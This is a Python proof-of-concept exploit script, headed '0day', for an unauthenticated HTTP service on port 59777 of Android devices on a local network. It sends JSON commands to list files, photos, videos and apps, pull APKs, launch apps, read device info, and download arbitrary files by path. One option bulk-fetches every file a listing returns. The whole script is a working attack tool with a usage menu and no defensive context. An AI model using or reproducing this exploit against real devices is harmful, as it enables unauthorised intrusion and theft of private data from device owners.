0day

1. import json
2. import re
3. import optparse
4. import requests
5. import sys
6. import os
7.  
8. from socket import *
9.  
10. network = '192.168.0.'
11.  
12. def sanitize_json(json):
13. json = json.replace("\'", "\"")
14. json = json.split('[')[1].split(']')[0]
15. json = json[0:len(json)-6] + "}"
16. return json
17.  
18. def clean_json(string):
19. string = re.sub(",[ \t\r\n]+}", "}", string)
20. string = re.sub(",[ \t\r\n]+\]", "]", string)
21.  
22. return string
23.  
24. def get_file(addr, filepath):
25. session = requests.Session()
26.  
27. headers = {"Content-Type": "application/json"}
28. address = 'http://' + addr + ':59777' + filepath
29. filename = filepath.rsplit('/', 1)[1]
30.  
31. print(filename)
32.  
33. resp = session.get(address, headers=headers, verify=False)
34. if resp and resp.status_code == 200:
35. if not os.path.exists(addr):
36. os.makedirs(addr)
37. with open(addr + "/" + filename, 'wb') as f:
38. f.write(resp.content)
39.  
40.  
41. def execute_cmd(addr, cmd, package, print_text = True):
42. session = requests.Session()
43.  
44. headers = {"Content-Type": "application/json"}
45. address = 'http://' + addr + ':59777'
46.  
47. if package != '':
48. data = '{ "command":' + cmd + ', "appPackageName":' + package + ' }'
49. else:
50. data = '{ "command":' + cmd + ' }'
51.  
52. resp = session.post(address, headers=headers, data=data, verify=False)
53.  
54. if cmd != 'getDeviceInfo' and cmd != 'appLaunch' and cmd != 'listAppsSdcard' and cmd != 'listVideos' and cmd != 'listFiles':
55. text = sanitize_json(resp.text)
56. else:
57. text = resp.text
58.  
59. if resp and resp.status_code == 200:
60. if cmd == 'getAppThumbnail':
61. with open(package + ".jpg", 'wb') as f:
62. f.write(resp.content)
63. elif cmd == 'appPull':
64. with open(package + ".apk", 'wb') as f:
65. f.write(resp.content)
66. else:
67. global_text = text
68. if print_text:
69. print(text)
70. else:
71. return text
72.  
73. def get_content(addr, cmd, package):
74. cmd_text = execute_cmd(addr, cmd, package, False)
75.  
76. # obtenemos los filepath
77. filepaths = []
78.  
79. clean_json_string = clean_json(cmd_text)
80. clean_json_string = "[" + clean_json_string + "]"
81. data = json.loads(clean_json_string)
82.  
83. for json_object in data:
84. for key, value in json_object.items():
85. if key == "location":
86. filepaths.append(value)
87.  
88. for filepath in filepaths:
89. get_file(addr, filepath)
90.  
91. def is_up(addr):
92. s = socket(AF_INET, SOCK_STREAM)
93. s.settimeout(1)
94. if not s.connect_ex((addr, 59777)):
95. s.close()
96. return 1
97. else:
98. s.close()
99.  
100.  
101. def show_available_cmds():
102. print('')
103. print('######################')
104. print('# Available Commands #')
105. print('######################')
106. print('')
107. print('listFiles: List all the files')
108. print('listPics: List all the pictures')
109. print('listVideos: List all the videos')
110. print('listAudios: List all the audio files')
111. print('listApps: List all the apps installed')
112. print('listAppsSystem: List all the system apps')
113. print('listAppsPhone: List all the phone apps')
114. print('listAppsSdcard: List all the apk files in the sdcard')
115. print('listAppsAll: List all the apps installed (system apps included)')
116. print('getDeviceInfo: Get device info. Package name parameter is needed')
117. print('appPull: Pull an app from the device')
118. print('appLaunch: Launch an app. Package name parameter is needed')
119. print('getAppThumbnail: Get the icon of an app. Package name parameter is needed')
120. print('')
121.  
122.  
123. def set_up_menu():
124. parser = optparse.OptionParser()
125.  
126. parser.add_option('-g', '--get-file',
127. action="store", dest="filepath",
128. help="Get file path", default="")
129. parser.add_option('-c', '--cmd',
130. action="store", dest="cmd",
131. help="Command to execute", default="")
132. parser.add_option('-p', '--pkg',
133. action="store", dest="package",
134. help="Package name", default="")
135. parser.add_option('-i', '--ip',
136. action="store", dest="ip",
137. help="IP address", default="")
138. parser.add_option('-a', '--all-content',
139. action="store", dest="content_cmd",
140. help="Get all content from command", default="")
141.  
142. return parser.parse_args()
143.  
144.  
145. def main():
146. options, _ = set_up_menu()
147.  
148. if len(sys.argv) > 1 and sys.argv[1] == 'list':
149. show_available_cmds()
150. elif (options.content_cmd != '' and options.ip != ''):
151. get_content(options.ip, options.content_cmd, options.package)
152. elif (options.filepath != '' or options.cmd != '') and options.ip != '':
153. if options.filepath != '':
154. get_file(options.ip, options.filepath)
155. elif options.cmd != '':
156. execute_cmd(options.ip, options.cmd, options.package, True)
157.  
158. else:
159. print('Usage:')
160. print('- python3 poc.py list')
161. print('- python3 poc.py --get-file [filepath]')
162. print('- python3 poc.py --cmd [cmd]')
163. print('- python3 poc.py --cmd [cmd] --pkg [package_name]')
164.  
165.  
166. if __name__ == '__main__':
167. main()